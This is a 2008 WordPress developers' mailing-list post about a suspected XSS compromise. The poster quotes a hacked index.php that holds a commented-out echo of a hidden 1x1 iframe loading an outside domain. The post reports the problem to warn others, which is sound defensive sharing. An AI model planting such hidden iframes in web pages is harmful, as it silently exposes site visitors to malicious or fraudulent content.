[wp-hackers] XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 18:39:49 GMT 2008

Yes that's exactly what i am saying. Here is my index.php:

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

// echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

I've commented the line so i can keep it for future investigations.

Our password have NOT been compromised as the only logins are from my
host and my friend's host. It could be an older version of a plugin
tough.

However, i had to report this as maybe someone will encounter the same
problem or so.

Thanks.